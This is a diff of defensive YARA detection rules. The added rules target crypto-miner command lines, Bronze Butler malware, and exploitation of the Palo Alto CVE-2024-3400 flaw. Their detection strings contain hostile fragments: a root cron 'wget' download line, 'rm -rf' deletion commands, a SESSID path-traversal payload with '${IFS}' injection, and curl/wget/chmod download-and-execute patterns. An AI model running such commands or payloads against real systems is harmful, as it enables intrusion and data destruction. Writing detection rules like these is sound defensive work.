+		logic_hash = "7097d404e0317230a5f60fc66fbcb2a2a5315f8fd348a7e689aaf75c26684f9e"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05"
 
 	strings:
-		$typelibguid0lo = "56598f1c-6d88-4994-a392-af337abe5777" ascii wide
+		$s1 = "Stratum notify: invalid Merkle branch" fullword ascii
+		$s2 = "-t, --threads=N       number of miner threads (default: number of processors)" fullword ascii
+		$s3 = "User-Agent: cpuminer/" ascii
+		$s4 = "hash > target (false positive)" fullword ascii
+		$s5 = "thread %d: %lu hashes, %s khash/s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 1000KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Nomsbuild : FILE
+rule SIGNATURE_BASE_PUA_Crypto_Mining_Commandline_Indicators_Oct21 : SCRIPT FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9bc0661d-c60f-582b-8f88-87e3dfa13ddd"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/rvrsh3ll/NoMSBuild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2704-L2718"
+		description = "Detects command line parameters often used by crypto mining software"
+		author = "Florian Roth (Nextron Systems)"
+		id = "afe5a63a-08c3-5cb7-b4b1-b996068124b7"
+		date = "2021-10-24"
+		modified = "2023-12-05"
+		reference = "https://www.poolwatch.io/coin/monero"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/pua_cryptocoin_miner.yar#L54-L88"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "df8bfecf2f983975a4885cbabc79d2b42c1281bdd918aa0fc9fa50ef75bbfe5d"
-		score = 75
+		logic_hash = "7ae1a77d8ff02ec539ce2b8be668530c3f509f0c408dfa7f2b749b0a4d6f45b7"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "SCRIPT, FILE"
 
 	strings:
-		$typelibguid0lo = "034a7b9f-18df-45da-b870-0e1cef500215" ascii wide
-		$typelibguid1lo = "59b449d7-c1e8-4f47-80b8-7375178961db" ascii wide
+		$s01 = " --cpu-priority="
+		$s02 = "--donate-level=0"
+		$s03 = " -o pool."
+		$s04 = " -o stratum+tcp://"
+		$s05 = " --nicehash"
+		$s06 = " --algo=rx/0 "
+		$se1 = "LS1kb25hdGUtbGV2ZWw9"
+		$se2 = "0tZG9uYXRlLWxldmVsP"
+		$se3 = "tLWRvbmF0ZS1sZXZlbD"
+		$se4 = "c3RyYXR1bSt0Y3A6Ly"
+		$se5 = "N0cmF0dW0rdGNwOi8v"
+		$se6 = "zdHJhdHVtK3RjcDovL"
+		$se7 = "c3RyYXR1bSt1ZHA6Ly"
+		$se8 = "N0cmF0dW0rdWRwOi8v"
+		$se9 = "zdHJhdHVtK3VkcDovL"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 5000KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Teleshadow2 : FILE
+rule SIGNATURE_BASE_Bronzebutler_Daserf_Delphi_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5b22f2c4-0bd1-5a5a-8867-8fbc773d2b44"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/ParsingTeam/TeleShadow2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2720-L2734"
+		description = "Detects malware / hacktool sample from Bronze Butler incident"
+		author = "Florian Roth (Nextron Systems)"
+		id = "88372e62-3bba-58dc-825c-f35533e42825"
+		date = "2017-10-14"
+		modified = "2023-12-05"
+		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bronze_butler.yar#L13-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "df4f26856b5ee348393ddb41e53bdfc8e2bed58ed9fc7b4f758cd1746431d85c"
+		logic_hash = "6034a6746a5bd762d869ad2e791d80aca8a1251afa9386d6b657f23092c6fc42"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "89a80ca92600af64eb9c32cab4e936c7d675cf815424d72438973e2d6788ef64"
+		hash2 = "b1bd03cd12638f44d9ace271f65645e7f9b707f86e9bcf790e0e5a96b755556b"
+		hash3 = "22e1965154bdb91dd281f0e86c8be96bf1f9a1e5fe93c60a1d30b79c0c0f0d43"
 
 	strings:
-		$typelibguid0lo = "42c5c356-39cf-4c07-96df-ebb0ccf78ca4" ascii wide
-		$typelibguid1lo = "0242b5b1-4d26-413e-8c8c-13b4ed30d510" ascii wide
+		$s1 = "Services.exe" fullword ascii
+		$s2 = "Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)" fullword ascii
+		$s3 = "l32.dll" fullword ascii
+		$s4 = "tProcess:" fullword ascii
+		$s5 = " InjectPr" ascii
+		$s6 = "Write$Error creating variant or safe array\x1fInvalid argument to time encode" fullword wide
+		$s7 = "on\\run /v " fullword ascii
+		$s8 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\run" fullword ascii
+		$s9 = "ms1ng2d3d2.exe" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Badpotato : FILE
+
+rule SIGNATURE_BASE_Bronzebutler_Daserf_C_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8bee12fc-fc29-5256-b559-d914ef202c0c"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/BeichenDream/BadPotato"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2736-L2749"
+		description = "Detects malware / hacktool sample from Bronze Butler incident"
+		author = "Florian Roth (Nextron Systems)"
+		id = "62a5cc4a-7c58-5e4d-ac23-8d1f850a540a"
+		date = "2017-10-14"
+		modified = "2023-12-05"
+		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bronze_butler.yar#L38-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b78b623666279dab22c263a5a925fc665646ddcc24d1638ebe54bad2ccd5ed4c"
+		logic_hash = "0b0c05db41d6b6ac48b31d8c22aead301470f465c2840ddc98ed9577d0aaa50b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a4afd9df1b4cc014c3a89d7b4a560fa3e368b02286c42841762714b23e68cc05"
+		hash2 = "90ac1fb148ded4f46949a5fea4cd8c65d4ea9585046d66459328a5866f8198b2"
+		hash3 = "331ac0965b50958db49b7794cc819b2945d7b5e5e919c185d83e997e205f107b"
+		hash4 = "b1fdc6dc330e78a66757b77cc67a0e9931b777cd7af9f839911eecb74c04420a"
+		hash5 = "15abe7b1355cd35375de6dde57608f6d3481755fdc9e71d2bfc7c7288db4cd92"
+		hash6 = "85544d2bcaf8e6ca32bbc0a9e9583c9db1dce837043f555a7ff66363d5858439"
+		hash7 = "2dc24622c1e91642a21a64c0dd31cbe953e8f77bd3d6abcf2c4676c3b11bb162"
+		hash8 = "2bdb88fa24cffba240b60416835189c76a9920b6c3f6e09c3c4b171c2f57031c"
 
 	strings:
-		$typelibguid0lo = "0527a14f-1591-4d94-943e-d6d784a50549" ascii wide
+		$s1 = "(c) 2010 DYAMAR EnGineerinG, All rights reserved, http://www.dyamar.com." fullword ascii
+		$s2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)" fullword ascii
+		$a1 = "ndkkwqgcm" fullword ascii
+		$a2 = "RtlGetCo" fullword ascii
+		$a3 = "hutils" fullword ascii
+		$b1 = "%USERPROFILE%\\System" fullword ascii
+		$b2 = "msid.dat" fullword ascii
+		$b3 = "DRIVE_REMOTE" fullword wide
+		$b4 = "%s%s%s%s%s%s%s%s%s%s%s%s" fullword ascii
+		$b5 = "jcbhe.asp" fullword ascii
+		$b6 = "edset.asp" fullword ascii
+		$b7 = "bxcve.asp" fullword ascii
+		$b8 = "hcvery.php" fullword ascii
+		$b9 = "ynhkef.php" fullword ascii
+		$b10 = "dkgwey.php" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "088382f4887e3b2c4bd5157f2d72b618" or all of ( $a* ) or 4 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Lethalhta : FILE
+rule SIGNATURE_BASE_Bronzebutler_Dget_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e8e1ad03-a5f0-5508-b78d-0de7bdaf4704"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/codewhitesec/LethalHTA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2751-L2765"
+		description = "Detects malware / hacktool sample from Bronze Butler incident"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d60fcc9f-0f17-5871-9e8e-71d26e2f46bc"
+		date = "2017-10-14"
+		modified = "2023-12-05"
+		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bronze_butler.yar#L80-L93"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ebcf9df0cdbab82ee2eea25479058366651746990b32e5af7cbf4da7dae8fafe"
+		logic_hash = "2d5537f581039fa4561950402a34cbd9abd54c167d659fbbe74f1cb83217e3fb"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "bd81521445639aaa5e3bcb5ece94f73feda3a91880a34a01f92639f8640251d6"
 
 	strings:
-		$typelibguid0lo = "784cde17-ff0f-4e43-911a-19119e89c43f" ascii wide
-		$typelibguid1lo = "7e2de2c0-61dc-43ab-a0ec-c27ee2172ea6" ascii wide
+		$s2 = "DGet Tool Made by XZ" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 10KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpstat : FILE
+rule SIGNATURE_BASE_Bronzebutler_Uacbypass_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "649c6cc0-e43b-558c-9567-00f352af528b"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/Raikia/SharpStat"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2767-L2780"
+		description = "Detects malware / hacktool sample from Bronze Butler incident"
+		author = "Florian Roth (Nextron Systems)"
+		id = "01853352-58fc-56a3-8c20-08405c71e251"
+		date = "2017-10-14"
+		modified = "2023-12-05"
+		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bronze_butler.yar#L95-L113"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b163520c47d593244a66ee64071147824486bde4174a5276972a3329b0271a73"
+		logic_hash = "64b70b9f5963be9009025c14a6e98be9642599af5226f77946b6255116fc22d8"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fe06b99a0287e2b2d9f7faffbda3a4b328ecc05eab56a3e730cfc99de803b192"
 
 	strings:
-		$typelibguid0lo = "ffc5c721-49c8-448d-8ff4-2e3a7b7cc383" ascii wide
+		$x1 = "\\Release\\BypassUacDll.pdb" ascii
+		$x2 = "%programfiles%internet exploreriexplore.exe" fullword wide
+		$x3 = "Elevation:Administrator!new:{3ad055" fullword wide
+		$x4 = "BypassUac.pdb" fullword ascii
+		$x5 = "[bypassUAC] started X64" fullword wide
+		$x6 = "[bypassUAC] started X86" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sneakyservice : FILE
+rule SIGNATURE_BASE_Bronzebutler_Xxmm_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d02d34f0-7aa1-5110-b7ea-670b5fb98150"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/malcomvetter/SneakyService"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2782-L2795"
+		description = "Detects malware / hacktool sample from Bronze Butler incident"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0e413e3a-fb61-58bc-9ecb-4ef76e83a7f3"
+		date = "2017-10-14"
+		modified = "2023-12-05"
+		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bronze_butler.yar#L115-L140"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3f9e4a9666875e8b70ced55924f7dae661e9be6e033bafe4efc1614fb65a7f08"
+		logic_hash = "eb9c12cbe2fe132a9588b744d10caee12716f622c31da8a1cee4c0f88d693e8e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7197de18bc5a4c854334ff979f3e4dafa16f43d7bf91edfe46f03e6cc88f7b73"
 
 	strings:
-		$typelibguid0lo = "897819d5-58e0-46a0-8e1a-91ea6a269d84" ascii wide
+		$x1 = "\\Release\\ReflectivLoader.pdb" ascii
+		$x3 = "\\Projects\\xxmm2\\Release\\" ascii
+		$x5 = "http://127.0.0.1/phptunnel.php" fullword ascii
+		$s1 = "xxmm2.exe" fullword ascii
+		$s2 = "\\AvUpdate.exe" wide
+		$s3 = "stdapi_fs_file_download" fullword ascii
+		$s4 = "stdapi_syncshell_open" fullword ascii
+		$s5 = "stdapi_execute_sleep" fullword ascii
+		$s6 = "stdapi_syncshell_kill" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpexec : FILE
+rule SIGNATURE_BASE_Bronzebutler_Rarstar_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5faff0aa-9ffe-5ac0-b9e0-ca9f79350036"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/anthemtotheego/SharpExec"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2797-L2810"
+		description = "Detects malware / hacktool sample from Bronze Butler incident"
+		author = "Florian Roth (Nextron Systems)"
+		id = "770270b3-6743-5efb-84d8-b63f1df800d9"
+		date = "2017-10-14"
+		modified = "2023-12-05"
+		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bronze_butler.yar#L142-L158"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "099c18601efc20cb50e7e463755ebda5898cce5d4a0253216a72018337da07f4"
+		logic_hash = "0e418e595020d91c575051c3b1639b09efad150c625b62eec3d1331f9792641b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0fc1b4fdf0dc5373f98de8817da9380479606f775f5aa0b9b0e1a78d4b49e5f4"
 
 	strings:
-		$typelibguid0lo = "7fbad126-e21c-4c4e-a9f0-613fcf585a71" ascii wide
+		$s1 = "Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+6.0;+SV1)" fullword wide
+		$s2 = "http://www.google.co.jp" fullword wide
+		$s3 = "16D73E22-873D-D58E-4F42-E6055BC9825E" fullword ascii
+		$s4 = "\\*.rar" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcom : FILE
+rule SIGNATURE_BASE_Daserf_Nov1_Bronzebutler : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "94da3da4-a8aa-5735-9a04-1f2447a330aa"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/rvrsh3ll/SharpCOM"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2812-L2825"
+		description = "Detects Daserf malware used by Bronze Butler"
+		author = "Florian Roth (Nextron Systems)"
+		id = "58c4d3dc-c516-567b-8746-4e185c3cd328"
+		date = "2017-11-08"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/ffeCfd"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bronze_butler.yar#L170-L196"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f409d4390fbf8eea8b288e02fbe75d4ecf338a239d8015511f4a9979a1e8a7df"
+		logic_hash = "75edc17c51f4ea82ff7722df2f5825721ff64445fb8c78b450f1333bd32b5829"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5ede6f93f26ccd6de2f93c9bd0f834279df5f5cfe3457915fae24a3aec46961b"
 
 	strings:
-		$typelibguid0lo = "51960f7d-76fe-499f-afbd-acabd7ba50d1" ascii wide
+		$x1 = "mstmp1845234.exe" fullword ascii
+		$x2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)" fullword ascii
+		$x3 = "Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)" fullword ascii
+		$s1 = "Content-Type: */*" fullword ascii
+		$s2 = "ProxyEnable" ascii fullword
+		$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer" ascii fullword
+		$s4 = "iexplore.exe" ascii fullword
+		$s5 = "\\SOFTWARE\\Microsoft\\Windows\\Cu" ascii
+		$s6 = "rrentVersion\\Internet Settings" fullword ascii
+		$s7 = "ws\\CurrentVersion\\Inter" fullword ascii
+		$s8 = "Documents an" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 1 of ( $x* ) or 5 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Inception : FILE
+rule SIGNATURE_BASE_APT_UTA028_Forensicartefacts_Paloalto_CVE_2024_3400_Apr24_1 : SCRIPT CVE_2024_3400
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8d18f1d5-9c9a-5258-9f96-fa24b702c6ad"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/two06/Inception"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2827-L2840"
+		description = "Detects forensic artefacts of APT UTA028 as found in a campaign exploiting the Palo Alto CVE-2024-3400 vulnerability"
+		author = "Florian Roth"
+		id = "32cf18ff-784d-5849-87f8-14ede7315188"
+		date = "2024-04-15"
+		modified = "2024-04-18"
+		reference = "https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_paloalto_cve_2024_3400_apr24.yar#L2-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "846dfe525380eae42905a3adfbfc56f6c0e6de8abfa4f92e5f02889448dbcc29"
-		score = 75
+		logic_hash = "1261eecca520daa0619859a45d2289d2c23c73be55e1a3849d2032a38e137f4d"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "SCRIPT, CVE-2024-3400"
 
 	strings:
-		$typelibguid0lo = "03d96b8c-efd1-44a9-8db2-0b74db5d247a" ascii wide
+		$x1 = "cmd = base64.b64decode(rst.group"
+		$x2 = "f.write(\"/*\"+output+\"*/\")"
+		$x3 = "* * * * * root wget -qO- http://"
+		$x4 = "rm -f /var/appweb/sslvpndocs/global-protect/*.css"
+		$x5a = "failed to unmarshal session(../"
+		$x5b = "failed to unmarshal session(./../"
+		$x6 = "rm -rf /opt/panlogs/tmp/device_telemetry/minute/*" base64
+		$x7 = "$(uname -a) > /var/" base64
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpwmi_1 : FILE
+rule SIGNATURE_BASE_EXPL_Paloalto_CVE_2024_3400_Apr24_1 : CVE_2024_3400
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "cd5a1c7b-a45a-5541-b1b0-cf19c991ed22"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		old_rule_name = "HKTL_NET_GUID_sharpwmi"
-		reference = "https://github.com/QAX-A-Team/sharpwmi"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2842-L2856"
+		description = "Detects characteristics of the exploit code used in attacks against Palo Alto GlobalProtect CVE-2024-3400"
+		author = "Florian Roth"
+		id = "1bcf0415-5351-5e09-ab93-496e8dc47c92"
+		date = "2024-04-15"
+		modified = "2025-03-21"
+		reference = "https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_paloalto_cve_2024_3400_apr24.yar#L27-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "295315b876579ee0d2eb60a44e4be643c143ec1331b155faf0ba61ab016df07f"
-		score = 75
+		logic_hash = "9ebc94a07b189a2d2dd252b5079fa494162739678fd2ca742e6877189a140da9"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2024-3400"
 
 	strings:
-		$typelibguid0lo = "bb357d38-6dc1-4f20-a54c-d664bd20677e" ascii wide
+		$x1 = "SESSID=../../../../opt/panlogs/"
+		$x2 = "SESSID=./../../../../opt/panlogs/"
+		$sa1 = "SESSID=../../../../"
+		$sa2 = "SESSID=./../../../../"
+		$sb2 = "${IFS}"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		1 of ( $x* ) or ( 1 of ( $sa* ) and $sb2 )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_CVE_2019_1064 : FILE
+rule SIGNATURE_BASE_SUSP_LNX_Base64_Download_Exec_Apr24 : SCRIPT
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "4640e874-faa4-58dc-a3f3-18246a343f15"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/RythmStick/CVE-2019-1064"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2858-L2871"
+		description = "Detects suspicious base64 encoded shell commands used for downloading and executing further stages"
+		author = "Paul Hager"
+		id = "df8dddef-3c49-500c-abc8-7f7de5aa69ae"
+		date = "2024-04-18"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_paloalto_cve_2024_3400_apr24.yar#L48-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5f72f2569d7e3c1ee6fcd742e22d56331bcbf130b9f2bbc63fbc1504c6597e57"
+		logic_hash = "90b7781812b4078550b0d66ba020b3bb0a8217f2de03492af98db6c619f31929"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "SCRIPT"
 
 	strings:
-		$typelibguid0lo = "ff97e98a-635e-4ea9-b2d0-1a13f6bdbc38" ascii wide
+		$sa1 = "curl http" base64
+		$sa2 = "wget http" base64
+		$sb1 = "chmod 777 " base64
+		$sb2 = "/tmp/" base64
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		1 of ( $sa* ) and all of ( $sb* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Tokenvator : FILE
+rule SIGNATURE_BASE_SUSP_PY_Import_Statement_Apr24_1
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "84ebb6b3-cf11-5172-95d4-d114bfeb0bc7"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/0xbadjuju/Tokenvator"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2873-L2886"
+		description = "Detects suspicious Python import statement and socket usage often found in Python reverse shells"
+		author = "Florian Roth"
+		id = "8e05f9a1-40a8-5d01-9e45-8779b0ff7a45"
+		date = "2024-04-15"
+		modified = "2025-03-21"
+		reference = "https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_paloalto_cve_2024_3400_apr24.yar#L67-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
